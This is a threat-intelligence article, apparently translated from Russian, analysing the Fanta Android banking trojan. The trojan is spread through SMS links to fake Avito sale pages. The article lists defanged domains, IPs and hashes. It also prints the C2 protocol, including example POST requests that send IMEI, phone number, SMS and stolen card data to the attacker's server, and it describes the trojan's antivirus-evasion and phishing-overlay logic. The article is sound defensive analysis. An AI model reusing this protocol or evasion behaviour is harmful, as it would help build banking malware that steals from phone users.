One day you want to sell something on Avito and, after posting a detailed description of your product (for example, a RAM module), you will receive the following message:
When you open the link, you'll see a seemingly innocuous page notifying you, the happy and successful seller, that your purchase has been made:
Once you've clicked the "Continue" button, an APK file will be downloaded to your Android device with an icon and a trustworthy name. You installed an application that for some reason requested AccessibilityService rights, then a couple of windows appeared and quickly disappeared and ... That's it.
You go to check your balance, but for some reason your banking application asks for your card details again. After entering the data, a terrible thing happens: for some reason that is still incomprehensible to you, the money begins to disappear from your account. You try to fix the problem, but your phone resists: it presses the back and home keys on its own, does not turn off and does not allow you to activate any security measures. As a result, you are left without money, your product is not bought, you are confused and wonder: what happened?
The answer is simple: you are a victim of the Fanta Android trojan, the Flexnet family. How did it happen? Now let's explain.
Authors: Andrey Polovinkin, Junior Malicious Code Analyst, Ivan Pisarev, Malicious Code Analyst.
Some statistics
The Flexnet family of Android Trojans was first reported back in 2015. Over a fairly long period of activity, the family has expanded to several subspecies: Fanta, Limebot, Lipton, etc. The Trojan, as well as the infrastructure associated with it, does not stand still: new effective distribution schemes are being developed - in our case, high-quality phishing pages aimed at a specific user-seller, and Trojan developers follow fashion trends in virus writing - they add new functionality that makes it possible to steal more efficiently money from infected devices and bypass protection mechanisms.
The campaign described in this article is aimed at users from Russia, a small number of infected devices have been recorded in Ukraine, and even fewer in Kazakhstan and Belarus.
Even though Flexnet has been in the Android Trojan arena for over 4 years and has been extensively studied by many researchers, it is still in good shape. Starting from January 2019, the potential amount of damage is more than 35 million rubles - and this is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where you could also find the source code of the Trojan with a detailed description. And this means that the statistics of damage in the world is even more impressive. Not a bad figure for such an old man, isn't it?
From sale to scam
As can be seen from the previously presented screenshot of the phishing page under the Internet service for placing ads Avito, it was prepared for a specific victim. Apparently, the attackers use one of Avito's parsers, pulling out the phone number and name of the seller, as well as a description of the product. After deploying the page and preparing the APK file, an SMS message is sent to the victim with his name and a link to a phishing page containing a description of his product and the amount received from the “sale” of the product. By clicking on the button, the user receives a malicious APK file - Fanta.
A study of the shcet491[.]ru domain showed that it is delegated to Hostinger's DNS servers:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
The domain zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243, and 31.220.23[.]235. However, the domain master resource record (A-record) points to the server with the IP address 178.132.1[.]240.
The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster worldstream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the United Kingdom and belong to the shared hosting server HOSTINGER. Used as a registrar openprov-ru. Domains also resolved to IP address 178.132.1[.]240:
- sdelka-ru[.]ru
- product-av[.]ru
- av-product[.]ru
- en-deal[.]en
- shcet382[.]ru
- sdelka221[.]en
- sdelka211[.]en
- vyplata437[.]ru
- viplata291[.]en
- translation273[.]en
- translation901[.]en
It should be noted that links of the following format were available from almost all domains:
http://(www.){0,1}<%domain%>/[0-9]{7}
This template also includes a link from an SMS message. According to historical data, it was found that several links according to the above pattern correspond to one domain, which indicates the use of one domain to distribute the Trojan to several victims.
Let's jump ahead a bit: as a control server, the Trojan downloaded from the link from SMS uses the address onusedseddohap[.]club. This domain was registered on 2019-03-12, and starting from 2019-04-29, APK applications interacted with this domain. Based on data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself is resolved to an IP address 217.23.14[.]27, located in the Netherlands and owned by a hoster worldstream. Used as a registrar namecheap. Domains have also been resolved to this IP address bad-racoon[.]club (starting from 2018-09-25) and bad-racoon[.]live (starting from 2018-10-25). with domain bad-racoon[.]club interacted with more than 80 APK files, with bad-racoon[.]live - more than 100.
In general, the course of the attack is as follows:
What does Fanta have under the lid?
Like many other Android Trojans, Fanta is able to read and send SMS messages, make USSD requests, and display its own windows on top of applications (including banking ones). However, in the arsenal of the functionality of this family has arrived: Fanta began to use Accessibility Service for various purposes: reading the contents of notifications of other applications, preventing detection and stopping the execution of a Trojan on an infected device, etc. Fanta works on all Android versions older than 4.4. In this article, we will take a closer look at the following Fanta sample:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immediately after launch
Immediately after launch, the Trojan hides its icon. The application can only work if the name of the infected device is not in the list:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(razor)
This check is performed in the main Trojan service - MainService. During the first launch, the application's configuration parameters are initialized with default values (the configuration data storage format and their meaning will be discussed later), as well as the registration of a new infected device on the control server. An HTTP POST request will be sent to the server with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and code of the country in which the operator is registered). Address is used as a management server hXXp://onuseseddohap[.]club/controller.php. In response, the server sends a message containing the fields bot_id, bot_pwd, server — these values are saved by the application as parameters of the CnC server. Parameter server optional if the field was not received: Fanta uses the registration address − hXXp://onuseseddohap[.]club/controller.php. The function of changing the CnC address can be used to solve two problems: to evenly distribute the load between several servers (with a large number of infected devices, the load on an unoptimized web server can be high), and also to use an alternative server in the event of a failure of one of the CnC servers .
If an error occurs while sending the request, the Trojan will repeat the registration process after 20 seconds.
After successfully registering the device, Fanta will display the following message to the user:
Important note: a service called System Security - the name of the Trojan service, and after clicking on the button OK a window with the infected device's Accessibility settings will open, where the user must himself grant Accessibility rights for the malicious service:
Once the user turns on Accessibility Service, Fanta accesses the contents of application windows and actions performed in them:
Immediately after obtaining Accessibility rights, the Trojan requests administrator rights and rights to read notifications:
With the help of the AccessibilityService, the application simulates keystrokes, thereby granting itself all the necessary rights.
Fanta creates several instances of the databases (which will be described later) necessary to save the configuration data, as well as the information about the infected device collected during the process. To send the collected information, the Trojan creates a recurring task designed to unload fields from the database and receive a command from the control server. The interval for calling CnC is set depending on the version of Android: in the case of 5.1, the interval will be 10 seconds, otherwise 60 seconds.
To receive a command, Fanta makes a request GetTask to the control server. In response, the CnC can send one of the following commands:
| Team | Description |
|---|---|
| 0 | Send SMS message |
| 1 | Make a phone call or USSD command |
| 2 | Updates a parameter interval |
| 3 | Updates a parameter intercept |
| 6 | Updates a parameter smsManager |
| 9 | Start collecting SMS messages |
| 11 | Reset phone to factory settings |
| 12 | Enabling/Disabling logging of the creation of dialog boxes |
Fanta also collects notifications from 70 banking, fast payment and e-wallet applications and stores them in a database.
Storage of configuration parameters
To store configuration parameters, Fanta uses the standard approach for the Android platform − Preferences-files. The settings will be saved to a file named settings. The description of the saved parameters is in the table below.
| First name | Default value | Possible values | Description |
|---|---|---|---|
| id | 0 | Integer | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Management server address |
| pwd | — | String | Server password |
| interval | 20 | Integer | Time interval. Shows how long to delay the following tasks:
|
| intercept | ALL | all/telNumber | If field is equal to string ALL or telNumber, then the received SMS message will be intercepted by the application and not shown to the user |
| smsManager | 0 | 0/1 | Enable / disable the application as the default SMS recipient |
| readDialog | false | true/false | Enable/Disable event logging accessibility event |
Fanta also uses the file smsManager:
| First name | Default value | Possible values | Description |
|---|---|---|---|
| pckg | — | String | The name of the SMS manager used |
Database interaction
The Trojan uses two databases during its operation. Named database a used to store various information collected from the phone. The second database is named fanta.db and is used to save settings responsible for creating phishing windows designed to collect information about bank cards.
Trojan uses database а to store the collected information and log their actions. Data is stored in a table logs. The following SQL query is used to create a table:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)The database contains the following information:
1. Logging the infected device on with a message Phone turned on!
2. Notifications from applications. The message is formed according to the following template:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bank card data from phishing forms created by the Trojan. Parameter VIEW_NAME can be one of the list:
- AliExpress
- Avito
- Google Play
- Miscellaneous <%App Name%>
The message is logged in the format:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Incoming / outgoing SMS messages in the format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Information about the package that creates the dialog box in the format:
(<%Package name%>)<%Package information%>
Table example logs:
One of the functionalities of Fanta is the collection of information about bank cards. Data is collected by creating phishing windows when opening banking applications. The Trojan creates a phishing window only once. The information that the window was shown to the user is stored in the table settings in the database fanta.db. The following SQL query is used to create the database:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);All table fields settings initialized to 1 (create phishing window) by default. After the user enters their data, the value will be set to 0. Table fields example settings:
- can_login — the field is responsible for displaying the form when opening the banking application
- first_bank - not used
- can_avito - the field is responsible for displaying the form when opening the Avito application
- can_ali - the field is responsible for displaying the form when opening the Aliexpress application
- can_another - the field is responsible for displaying the form when opening any application from the list: Yula, Pandao, Drome Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
- can_card - the field is responsible for showing the form when opening Google Play
Interaction with the control server
Network interaction with the control server takes place via the HTTP protocol. Fanta uses the popular Retrofit library to work with the network. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed when registering on the server. A cookie may be returned from the server. Fanta makes the following requests to the server:
- Bot registration on the control server occurs once at the first start. The following data about the infected device is sent to the server:
· Cookie - cookies received from the server (default value is an empty string)
· Fashion - string constant register_bot
· prefix - integer constant 2
· version_sdk - is formed according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI of the infected device
· country — code of the country in which the operator is registered, in ISO format
· number - phone number
· operator - operator nameAn example of a request sent to the server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>In response to the request, the server should return a JSON object containing the following parameters:
bot_id — identifier of the infected device. If bot_id is equal to 0, Fanta will re-execute the request.
bot_pwd - password for the server.
server — address of the control server. Optional parameter. If the parameter is not specified, the address saved in the application will be used.JSON object example:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Request to receive a command from the server. The following data is sent to the server:
· Cookie — cookies received from the server
· bid — id of the infected device, which was received when sending the request register_bot
· pwd -password for the server
· divice_admin - the field determines whether administrator rights have been obtained. If administrator rights have been obtained, the field is equal to 1otherwise 0
· Accessibility - the status of the Accessibility Service. If the service was started, the value is 1otherwise 0
· SMSManager - shows if the trojan is enabled as the default application for receiving SMS
· screen — shows what state the screen is in. value will be set 1if the screen is on, otherwise 0;An example of a request sent to the server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Depending on the command, the server may return a JSON object with different parameters:
· Team Send SMS message: The parameters contain the phone number, the text of the SMS message and the identifier of the message to be sent. The identifier is used when sending a message to the server with the type setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Team Make a phone call or USSD command: The phone number or command comes in the body of the response.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Team Change the interval parameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Team Change the intercept parameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Team Change SmsManager field.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Team Collect SMS messages from an infected device.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Team Reset phone to factory settings:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Team Change ReadDialog setting.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Sending a message with type setSmsStatus. This request is made after the execution of the command Send SMS message. The request looks like this:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Submitting the contents of the database. One string is transferred per request. The following data is sent to the server:
· Cookie — cookies received from the server
· Fashion - string constant setSaveInboxSms
· bid — id of the infected device, which was received when sending the request register_bot
· text — text in the current database record (field d from the table logs in the database а)
· number — name of the current database record (field p from the table logs in the database а)
· sms_mode — integer value (field m from the table logs in the database а)The request looks like this:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Upon successful submission to the server, the row will be removed from the table. An example of a JSON object returned by the server:
{ "response":[], "status":"ok" }
Interaction with AccessibilityService
The AccessibilityService was implemented to make it easier for people with disabilities to use Android devices. In most cases, physical interaction is required to interact with an application. AccessibilityService allows you to make them programmatically. Fanta uses the service to create fake windows in banking applications and prevent system settings and some applications from opening.
Using the functionality of the AccessibilityService, the Trojan monitors changes to elements on the screen of an infected device. As previously described, the Fanta settings contain a parameter responsible for logging operations with dialog boxes - readDialog. If this option is set, information about the name and description of the package that fired the event will be added to the database. The Trojan performs the following actions when events are triggered:
- Simulates back and home keystrokes in case of:
· if the user wants to reboot their device
· if the user wants to delete the “Avito” application or change the access rights
· if there is a mention of the “Avito” application on the page
· when you open the “Google Play Protect” app
· when opening pages with AccessibilityService settings
· when the System Security dialog box appears
· when opening the page with settings “Draw over other app”
· when you open the page “Applications”, “Backup and Reset”, “Data Reset”, “Reset Settings”, “Developer Panel”, “Spec. opportunities”, “Accessibility”, “Special rights”
· if the event was generated by certain applications.Application List
- android
- Master Lite
- Clean Master
- Clean Master for x86 CPU
- Meizu Application Permission Management
- MIUI Security
- Clean Master - Antivirus & Cache & Junk Cleaner
- Parental control and GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & free protection 2019
- Mobile Security MegaFon
- AVG Protection for Xperia
- Mobile Security
- Malwarebytes antivirus & protection
- Antivirus for Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus for tablet Huawei System Manager
- Samsung Accessibility
- Samsung Smart Manager
- SecurityMaster
- Speed booster
- Dr.Web
- Dr Web Security Space
- Dr.Web Mobile Control Center
- Dr Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Mobile Security
- Kaspersky Internet Security: Anti-Virus and Protection
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - protection and management
- AVG Antivirus free 2019 - Protection for Android
- Android antivirus
- Norton Mobile Security and Antivirus
- Antivirus, firewall, VPN, mobile security
- Mobile Security: Antivirus, VPN, Anti-Theft
- Antivirus for Android
- If permission is requested when sending an SMS message to a short number, Fanta simulates clicking on the checkbox Remember choice and button send.
- When you try to take away administrator rights from the Trojan, it blocks the phone screen.
- Prevents new administrators from being added.
- If the antivirus application dr.web detected a threat, Fanta simulates pressing a button ignore.
- The trojan simulates pressing the back and home button if the event was generated by the application Samsung Device Care.
- Fanta creates phishing windows with forms for entering information about bank cards if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, etc.
Phishing Forms
Fanta analyzes which applications run on the infected device. If an application of interest has been opened, the Trojan displays a phishing window on top of all others, which is a form for entering information about a bank card. The user needs to enter the following data:
- Card number
- Card expiry date
- CVV
- Cardholder's name (not for all banks)
Depending on the running application, different phishing windows will be shown. The following are examples of some of them:
AliExpress:
Avto:
For some other applications like Google Play Market, Aviasales, Pandao, Booking, Trivago:
How it really was
Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. Therefore, the real, non-director's version differs from the one told earlier: the person received an interesting SMS, after which he gave it to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. Happy ending, right? However, not all stories end so well, and so that yours does not look like a director's cut with a loss of money, in most cases it is enough to adhere to the following long-described rules:
- Do not install apps for your Android mobile device from any source other than Google Play
- when installing the application, pay special attention to the rights requested by the application
- pay attention to extensions of uploaded files
- install Android OS updates regularly
- do not visit suspicious resources and do not download files from there
- Do not click on links received in SMS messages.
Source: habr.com